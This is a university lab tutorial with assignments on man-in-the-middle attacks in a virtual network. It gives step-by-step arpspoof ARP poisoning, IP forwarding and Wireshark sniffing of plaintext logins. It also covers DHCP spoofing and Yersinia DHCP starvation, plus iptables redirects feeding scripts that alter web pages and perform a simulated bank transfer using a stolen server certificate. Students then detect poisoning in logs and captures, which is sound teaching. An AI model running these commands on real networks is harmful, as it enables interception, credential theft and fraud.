Man-in-the-middle attacks

Authors: Mikhail Zolotukhin and Timo Hämäläinen

1. Introduction

This tutorial explains how to perform Man-In-The-Middle (MITM) attacks by poisoning victim's ARP tables and spoofing DHCP server. In addition, we will demonstrate what the attacker can do once he has got himself in the middle. We assume that you already created and configured virtual network environment as it is described in previous tutorials. The remainder of this tutorial is organized as follows. Several preliminary tasks are presented in Section 2. Section 3 describes a couple of simple MITM attacks. Section 4 demonstrates two applications of the attacks. Assignments are listed in Section 5. Section 6 concludes the tutorial.

This tutorial (including assignments) takes on average 7.80 hours to complete.

2. Preliminary questions

What is arpwatch? Briefly explain how does it work.
Read article "Using JPCAP to prevent man-in-the-middle attacks in a local area network environment". Explain what is ARP poisoning and how authors propose to detect it.
Briefly explain how does SSL/TLS protocol work.
Read article "SSL/TLS Status Survey in Japan - Transitioning against the Renegotiation Vulnerability and Short RSA Key Length Problem". Explain what is SSL MITM attack and explain the main results of SSL/TLS vulnerability scanning in Japan.

3. MITM attacks

Since the attacker managed to get access to bob-VM, it can now fully control bob-VM by installing any applications and executing any commands. Without loss of generality, in this tutorial, we use bob-VM to attack other machines in LAN subnet.

3.1 ARP poisoning

ARP is a stateless protocol. A client sends ARP request and the server responds with ARP reply. ARP reply can be sent without ARP request. The client and server update their cache entries accordingly. In this section, we show how to poison ARP cache of alice-VM.

Start the following machines: gateway, dnsserv, webserv, alice and bob.

On alice and bob VMs, install net-tools if it has not been installed yet:
```
$ sudo apt install net-tools
```
Using ifconfig command, check IP and MAC addresses of alice-VM, bob-VM and LAN interface of the gateway-VM.

In Ubuntu clients you can run
```
$ ifconfig
```
in the terminal. In pfSense, you should start shell (press "8" in the main menu), and then
```
$ ifconfig em1
```
Store this information in a text file or just write on a list of paper. The result should look like below (in your case, IP and MAC addresses can be different):
- gateway (interface em1):
  - IP: 192.168.10.1
  - MAC: 08:00:27:e3:87:b5
- alice:
  - IP: 192.168.10.101
  - MAC: 08:00:27:e0:67:55
- bob:
  - IP: 192.168.10.102
  - MAC: 08:00:27:8b:31:0b
You can also get all the IP and MAC addresses from the pfsense web configurator in Diagnostics -> ARP Table.

Alice can find default router (gateway IP address), by running in the terminal:
```
$ route -n
```
The default router IP should be 192.168.10.1 (or pfsense.home.arpa). Send ping request to router's IP 192.168.10.1 to update the ARP cache, enter:
```
$ ping -c 4 192.168.10.1
```
Type the following command to check the router's MAC address stored in alice-VM's ARP cache:
```
$ arp -a
```
Here is an example of the output:
```
dns.home.arpa (192.168.10.2) at 08:00:27:12:44:20 [ether] on enp0s3
pfsense.home.arpa (192.168.10.1) at 08:00:27:e3:87:b5 [ether] on enp0s3
```
If you have "?" in the left part of these lines, you most likely made a typo when configuring DNS reverse zones, but it is not really important at this point. The most important thing, the gateway's IP (192.168.10.1) and MAC should be there.

The attacker (bob-VM) wants to change the victim's (alice-VM's) ARP cache so that traffic from the victim to the gateway will be redirected to the attacker. For this purpose, go to bob-VM, and install "dsniff":
```
$ sudo apt install dsniff
```
You will also need scapy:
```
$ sudo apt install python3-scapy
```
From bob-VM, run "arpspoof" command as follows:
```
$ sudo arpspoof -i enp0s3 -t 192.168.10.101 192.168.10.1
```
where
- enp0s3 - bob-VM's network interface
- 192.168.10.101 - alice-VM's IP,
- 192.168.10.1 - gateway's IP.
In your case, IP addresses can be different. It allows bob-VM to poison ARP cache of alice-VM. Bob sends a spoofed ARP reply to alice-VM. After receiving this reply, alice-VM updates its ARP cache with the gateway's IP address and bob's MAC address. In order to maintain a valid cache and prevent legitimate ARP requests affect the cache, bob-VM has to send these replies periodically.

Now, go back to alice-VM and check ARP cache again:
```
$ arp -a
```
You can see that now MAC address of the gateway has been changed and it is equal to the MAC of bob-VM. In addition, there will be new entry with unknown name (this is simply because we did not configure an entry for bob-VM in our DNS server), but with bob's IP and MAC.
```
pfsense.home.arpa (192.168.10.1) at 08:00:27:8b:31:0b [ether] on enp0s3
? (192.168.10.102) at 08:00:27:8b:31:0b [ether] on enp0s3
dns.home.arpa (192.168.10.2) at 08:00:27:12:44:20 [ether] on enp0s3
```
Thus, all packets which go to the gateway's IP will in fact go to bob-VM.

While poisoning ARP cache by bob-VM, let's try to go to "google.fi" from alice-VM's browser. Obviously it is not possible, because all packets that previously go to the Internet through the gateway now go to bob-VM and this bob-VM does not forward them anywhere. In this case, the victim would easily detect the attacker's activity.

However, let us enable forwarding on bob-VM. Do not stop poisoning, but open new terminal and execute:
```
$ sudo sysctl -w net.ipv4.ip_forward=1
```
Check that forwarding is enabled on bob-VM by typing in its terminal:
```
$ cat /proc/sys/net/ipv4/ip_forward
```
The value must be equal to "1".

Try again go to some external web site in the browser of alice-VM. It will work and the victim will not suspect that its outgoing traffic goes through the attacker.

Now let's make bob-VM get access to the incoming traffic of the client. For this purpose, open another terminal on bob-VM and run one more "arpspoof" as follows (we assume that the first one is still running):
```
$ sudo arpspoof -i enp0s3 -t 192.168.10.1 192.168.10.101
```
Now all the traffic which goes between alice-VM and the gateway in fact goes through bob-VM.

To make sure of this fact, let us install Wireshark on bob-VM. Wireshark is a free and open-source network traffic packet analyser. You can install it by typing in bob'VM's terminal:
```
$ sudo apt update
```
```
$ sudo apt install wireshark -y
```

Open Wireshark
```
$ sudo wireshark
```
and start capturing packets on interface "enp0s3".
On alice-VM, open the Internet browser and login to:
```
http://oceanic.ties327.jyu.fi/accounts/index.php 
```
You obviously need to use plain HTTP here, HTTPS will be encrypted, so you will not be able to see the password.

If you now check Wireshark on bob-VM, among others you will see the following HTTP request (you can use a display filter for better visibility, e.g. "ip.addr==192.168.11.2"):
```
...

192.168.10.101 192.168.11.2 HTTP POST /accounts/loginproc.php HTTP/1.1

...
```
Clicking on the request and scrolling data at the bottom the attacker can find Alice's credentials. Thus, HTTP traffic from alice-VM to the web server and in the opposite direction goes through bob-VM.

Stop the attack by pressing CTRL+C in both bob-VM's terminals where "arpspoof" is running. Also stop capturing packets in "wireshark".

3.2 DHCP spoofing

The DHCP (Dynamic Host Configuration Protocol) is often used to configure hosts on IP networks. DHCP allows hosts to be dynamically configured with IP address, subnet mask, gateway address and DNS server address. First, a client sends (broadcasts) DHCP discover containing transaction ID. The DHCP server responds with DHCP offer which contains the same transaction ID. The client then sends DHCP request and the DHCP server responds with DHCP ACK. An attacker can wait for DHCP discover request from the client. After getting this request, the attacker may spoof the DHCP offer by assigning a malicious gateway or/and DNS server. After that, the client responds with DHCP request and the attacker spoofs DHCP ACK as well. Finally, the client updates its DNS server and gateway addresses. However, when DHCP discover arrives to the legitimate DHCP server, this server responds to the client with its legitimate DHCP offer. If the client gets the legitimate offer first, then DHCP spoofing will not work. For this reason, the attacker might DoS the DHCP server during the attack so that the DHCP server cannot respond to clients timely. In this section, we show how to spoof the DHCP offer.

We assume that you still have the following machines up and running: gateway, dnsserv, webserv, alice-VM and bob-VM.
When a new user enters the network, it will send a DHCP request to get an IP address and other information from the legitimate DHCP server. If the legitimate server answers to this request before the attacker, the attack will not succeed. To exclude this situation, the attacker can try to disable the legitimate server. Let us assume that our legitimate DHCP server is temporarily unavailable, i.e. disable DHCP service on the gateway-VM. For example, you can do it by accessing the pfSense's GUI from alice-VM' Firefox:
```
https://pfsense.home.arpa
```
login using default credentials, go to Services -> DHCP server, make sure that LAN subnet is selected and remove mark from checkbox "Enable DHCP server on LAN interface". Scroll to the end of the page and click "Save".

Once DHCP server has been disabled, do not reboot bob-VM, otherwise you will end up with no IP address and therefore cannot access pfSense!

However, if in some unexplainable circumstances you have rebooted bob-VM, below are the instructions how to set static IP address on bob-VM in order to get the network connection back.

On bob-VM, open file:
```
$ sudo nano /etc/netplan/01-network-manager-all.yaml
```
and edit (add) lines in the file as follows:
```
network:
 version: 2
 ethernets:
  enp0s3:
   dhcp4: no
   addresses: [192.168.10.102/24]
   gateway4: 192.168.10.1
   nameservers:
    addresses: [8.8.8.8,8.8.4.4]
```
Apply netplan changes:
```
$ sudo netplan apply
```
After that, bob-VM will have static IP and you will be able to connect to the gateway and continue with the tutorial.
Now we need the target. For the sake of demonstration, we will use alice-VM. As mentioned above, write down information about the alice-VM's network interface (especially its MAC address) somewhere, and after that shut down the alice-VM!

On bob-VM, download DHCP spoofing attack script:

$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/
files/DhcpSpoofing.py

In this tutorial, we test the scenario when the attacker assigns a malicious gateway to the DHCP offer for the victim. For this purpose, on bob-VM, run DhcpSpoofing.py as follows:

$ sudo python3 DhcpSpoofing.py <alice-VM's MAC> <new alice-VM's IP (any IP not occupied 
in LAN subnet)> <bob-VM's IP> <subnet mask> <fake gateway/bob-VM's IP> <dnsserv-VM's IP>

for example, in my case, the command was:

$ sudo python3 DhcpSpoofing.py 08:00:27:e0:67:55 192.168.10.88 192.168.10.102 
255.255.255.0 192.168.10.102 192.168.10.2

In your case, MAC and IP addresses can be different.

Finally, start alice-VM (if it is already running, restart it) and wait until it gets IP address from the attacker. In the terminal of the attacker where DHCP spoofing is running, you will see the corresponding message.

Check "ifconfig" of alice-VM. You can notice that the IP is now "192.168.10.88" that is actually assigned by the attacker, but this does not really matter. What matters is that alice-VM's default gateway is now bob-VM. You can check it by typing in alice-VM's terminal:
```
$ route -n
```
Therefore, all alice-VM's external network traffic will go through bob-VM.

Stop the DHCP spoofing attack script by hitting CTRL+C in bob-VM's terminal. On alice-VM, in the pfsense web configurator, go to Services -> DHCP server, make sure that LAN subnet is selected and put mark to checkbox "Enable DHCP server on LAN interface". Scroll to the end of the page and click "Save". Reboot alice-VM and see that now its IP address and default gateway have changed to those prior the attack.

If you set Bob's IP to static during the tutorial, you can revert it back as described below. Open netplan settings:
```
$ sudo nano /etc/netplan/01-network-manager-all.yaml
```
Change the configurations back to these:
```
network:
 version: 2
 ethernets:
  enp0s3:
   dhcp4: yes
```
and apply:
```
$ sudo netplan apply
```

4. MITM attack applications

4.1 Annoying HTTP server attack

Once the attacker has put himself into the middle between his victim and other network nodes, he can try to change HTTP requests and responses which go through him. In this subsection, the attacker changes web pages which the victim requested from a web site to confuse the victim. For this purpose, the attacker first spoofs ARP cache of the victim in order to be "in the middle". Then, when the victim requests a web page, the attacker modifies all pictures on the page and sends the result to the victim :)

Run following machines if they are not running yet: gateway, dnsserv, alice-VM and bob-VM.

Run "arpspoof" in two different terminals of bob-VM to spoof ARP cache of alice-VM and the gateway:
```
$ sudo arpspoof -i enp0s3 -t 192.168.10.101 192.168.10.1
$ sudo arpspoof -i enp0s3 -t 192.168.10.1 192.168.10.101
```
where
- 192.168.10.101 - alice-VM's IP,
- 192.168.10.1 - gateway's IP.
In your case, IP addresses can be different.

Check that IP forwarding is still enabled on bob-VM:
```
$ cat /proc/sys/net/ipv4/ip_forward
```
The value must be equal to "1".

On bob-VM, redirect port 80 which is used for HTTP to another one, e.g. 8080. For this purpose,execute:
```
$ sudo iptables -t nat -A PREROUTING -i enp0s3 -p tcp --dport 80 -j REDIRECT --to-port 
8080
```

From bob-VM, download AnnoyingHttpServer.py from

$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/
AnnoyingHttpServer.py

Download any .png image file from the Internet to bob-VM, call it "hacked.png" and put to the same directory where AnnoyingHttpServer.py is located.

We will use python2 for two remaining attacks in the tutorial. Install python2:
```
$ sudo apt install python2
```
and python-pip:
```
$ sudo apt install python-pip
```
After that, install python package pillow using python2:
```
$ python2 -m pip install pillow
```
Finally, run our annoying server script as follows:
```
$ python2 AnnoyingHttpServer.py 192.168.10.102 8080
```
where
- 192.168.10.102 - attacker's IP,
- 8080 - the port number to which you redirected HTTP traffic.
In your case, IP address and port number can be different.

To demonstrate the attack, in alice-VM's browser, open a web site that uses port 80 (plain HTTP, not HTTPS) and contains images in jpeg or png format. Apparently, to find a website that works in plain HTTP is not an easy task nowadays. Here are some examples (at least at the moment of writing this tutorial these worked in plain HTTP):
```
http://www.social-iot.org
http://www.openoffice.org
http://iki.fi
```
Try those or any other you could find. If the attack has been performed successfully, a half of pictures will be replaced and another half will be rotated. Obviously, the script will not work with web sites that use HTTPS, e.g. "yle.fi" should look normal. Try different web sites to see the attack effect. If you find other plain HTTP web sites that can be used to demonstrate the attack effect, write them in the comments to this paragraph.

After testing the attack, go back to bob-VM, stop the annoying server python script (CTRL+C) and flush iptables rules using the following command:
```
$ sudo iptables -t nat -F
```
It is not necessary to stop ARP poisoning in bob-VM's terminals, since you will need it for the attack described in the next subsection.

4.2 Bank attack

In this subsection, we describe the case when the attacker places himself "in the middle" and then steals money from the victim's bank account, when the victim logs in to the system. Despite the fact that cryptographic protocol SSL is used by the bank's web site, the attacker is still able to make transfer of the victim's money to another bank account.

Start webserv-VM (if it is not running yet) in addition to the VMs already running (gateway, dnsserv, alice and bob).

Run (if it is not running yet) "arpspoof" in two different terminals to spoof ARP cache of the victim and the gateway:
```
$ sudo arpspoof -i enp0s3 -t 192.168.10.101 192.168.10.1
```
```
$ sudo arpspoof -i enp0s3 -t 192.168.10.1 192.168.10.101
```
where
- enp0s3 - bob-VM's interface
- 192.168.10.101 - alice-VM's IP,
- 192.168.10.1 - gateway's IP.
In your case, IP addresses can be different.

Enable forwarding on bob-VM (if it has not been enabled yet).

Before the attack, from alice-VM's web browser go to the bank web page using SSL/TLS protocol (https):
```
$ https://oceanic.ties327.jyu.fi/accounts/index.php
```
You should stay on the login page or the attack may not succeed!

Go back to bob-VM and redirect SSL traffic from port 443 to another one (e.g. 8443) with iptables:
```
$ sudo iptables -t nat -A PREROUTING -i enp0s3 -p tcp --dport 443 -j REDIRECT --to-port
8443
```

Download python script "BankAttack.py" (command below is one line, there is no space before "BankAttack.py"):
```
$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/BankAttack.py
```

Remember when we brute-forced the web server's ssh account's password? This is the time to use it! On bob-VM, download the certificate file "server_oceanic.pem" from webserv-VM using the password stolen (which should be "webserv"):
```
$ scp  webserv@oceanic.ties327.jyu.fi:/etc/ssl/certs/server_oceanic.pem ./
```
Put this file to the same directory where the "BankAttack.py" is located on bob-VM.

Run the script as follows:
```
$ python2 BankAttack.py 192.168.10.102 8443
```
where
- 192.168.10.102 - bob's IP address,
- 8443 - the port number to which you redirected HTTPS traffic.
In your case, IP address and port number can be different.

Go back to alice-VM and try to log in using Alice's account (username: "alice", password: "hackmenot"). After answering security question (if the security question is "What comes after drink me?" then the answer is "eat me"; if the security question is "Who gives good advices?", the answer is "caterpillar"), as a result, part of Alice's money will be transferred to some white rabbit. In bob-VM's console, you will probably see an exception generated by SocketServer.py: "AttributeError: 'NoneType' object has no attribute 'close'". However, it should not affect the result of the attack.

In the case of success, you will see that Alice's money are transfered to the white rabbit's account. If you have "Secure Connection Failed" error in Alice's browser, it is still all good at this point.

Go back to bob-VM. Stop BankAttack.py with Ctrl+C, stop Arpspoof posioning in both bob-VM's terminals, flush iptables rules:
```
$ sudo iptables -t nat -F
```
In alice-VM's browser, go to the bank web page again and log in. In the case of successfully performed attack, you should see that Alice's money are transfered to some account and Alice's current balance is decreased by 500k from original 1kk.

5. Assignment (5p.)

5.1 Preliminary

Complete the test based on the preliminary questions (1 point).

# mitm_basic1

# mitm_basic2

5.2 Basic

Disable the gateway's DHCP service remotely from bob-VM by performing DHCP starvation attack with Yersinia. For this purpose, perform the following actions:

Install Yersinia on bob-VM
Start Yersinia in interactive mode
Check that the network interface is selected correctly, otherwise, change it by pressing "i" and selecting the correct interface
Press "g" and select the correct protocol
Press "x" and select the attack to start, after that, the number of packets should start growing
To see the effect of the attack, reboot alice-VM, and once it has rebooted check its IP address and network connectivity
To stop the attack, go back to Yersinia running on bob-VM, press "l" and select the attack to stop (in our case, there should be only one attack running, so just press enter), after that, the packet number should stop growing
Reboot alice-VM to restore its network connectivity

Answer the questions below based on the experiments just conducted (1 point).

# mitm_basic4

# mitm_basic5

# mitm_basic6

# mitm_basic7

# mitm_basic8

# mitm_basic9

# mitm_basic10

# mitm_basic11

# mitm_basic12

# mitm_basic13

What are simple countermeasures against the MITM attacks explained in this tutorial? For each countermeasure listed, select the attack against which it is the most effective or mark it as non-effective against any of the attacks discussed (1 point).

# mitm_basic3

Updated the 7th countermeasure, it was a bit weird; fixed points for the students who answered incorrectly to this

Updated the 10th countermeasure to make clearer what kind of validation is meant here.

— 19 Sep 23 (edited 03 Oct 23)

5.3 Advanced

Download an archive with 5 ARP cache logs:

$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/arp_logs.zip

Each subdirectory in the archive corresponds to one event (potential ARP poisoning attack) and it contains ARP cache logs collected on three hosts: 192.168.10.101, 192.168.10.102 and 192.168.10.103 similarly how it has been done during the tutorial on alice-VM.

Analyze the logs provided to determine which host is responsible for the attack (if any) and which one is the attack target in each of the 5 cases. For this purpose, you can write (or look in the Internet for) a simple script which can help a user to recognize that she is under an ARP poisoning attack based on the analysis of ARP cache. Alternatively, if you do not like yourself, you can look through the files manually.

Select the correct answers for each of the 5 attacks in the boxes below. If in your opinion the logs look fine, i.e. there is no attack, select "There is no poisoning" for both the attacker and the target.

Tip: all the entries corresponding to the attacks (if present) can be found somewhere in the middle of the logs, i.e. IP-MAC pairings at the beginning and at the end of the log files correspond to the normal state of the network. It is also worth mentioning that in all the cases where the poisoning takes place the attacker uses the "arpspoof" command in the same way as it has been done in the tutorial, meaning that the attacker always uses its own MAC address as the substitute when spoofing.

ARP cache analysis (1 point):

# mitm_advanced1

# mitm_advanced2

# mitm_advanced3

# mitm_advanced4

# mitm_advanced5

I've looked at all three files and can't figure out how to answer this one correctly with the given options. Am I missing something?

— 18 Sep 23

Hmm... I am trying to understand what may cause confusion in this log, to me it looks similar to other 4. Other 5 students who have completed this assignment have answered correctly.

— 21 Sep 23 (edited 21 Sep 23)

It looked like there were two attackers and two targets. I think I'm just missing something.

— 21 Sep 23 (edited 21 Sep 23)

holy quacamole, you are right; re-uploaded the assignment files and fixed your points; on the other hand, why would you choose "no poisoning" if there are two? :)

— 22 Sep 23

It was my second answer and I was desperate because there was no right option :D

— 22 Sep 23 (edited 22 Sep 23)

Download an archive with 4 packet captures:

$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/arp_pcaps.zip

Each capture file in the archive corresponds to a potential ARP poisoning attack in the same network as the one used in the assignment above. Analyze the PCAP files provided to determine which host is responsible for the attack and which one is the attack target in each of the 4 cases. As previously, you can either write a simple script, e.g. using scapy, or look through the files manually, for example using Wireshark.

Select the correct answers for each of the 4 attacks in the boxes below. If in your opinion the capture looks fine, i.e. there is no attack, select "There is no poisoning" for both the attacker and the target.

Tip: these captures have been recorded in the same network as before, i.e. IP-MAC pairings can be retrieved from the (non-spoofed) ARP cache log files from the previous assignment. As previously, the attacker always uses its own MAC address as the substitute when spoofing.

PCAP file analysis (1 point):

# mitm_advanced6

# mitm_advanced7

# mitm_advanced8

# mitm_advanced9

5.4 General comments and feedback

Let us know how many hours in total have you spent on this assignment:

# mitm_time

On a scale from 1 to 10, estimate how interesting and difficult was the tutorial:

# mitm_interest

# mitm_difficulty

You can also give us some general feedback:

# mitm_feedback

6. Conclusion

In this tutorial, we have learned how to poison ARP cache of a victim and spoof DHCP server replies. Furthermore, we have used ARP poisoning to annoy a user by changing the content of web pages requested. In addition, the scenario in which the attacker steals money from the victim's bank account has been demonstrated. All these attacks are very dangerous and can be easily performed, if the attacker managed to get inside your LAN. In addition, there are no any in-built countermeasures against this type of attack. For this reason, you should always take this fact into account when operating in your local network.

More information on the topic can be found at: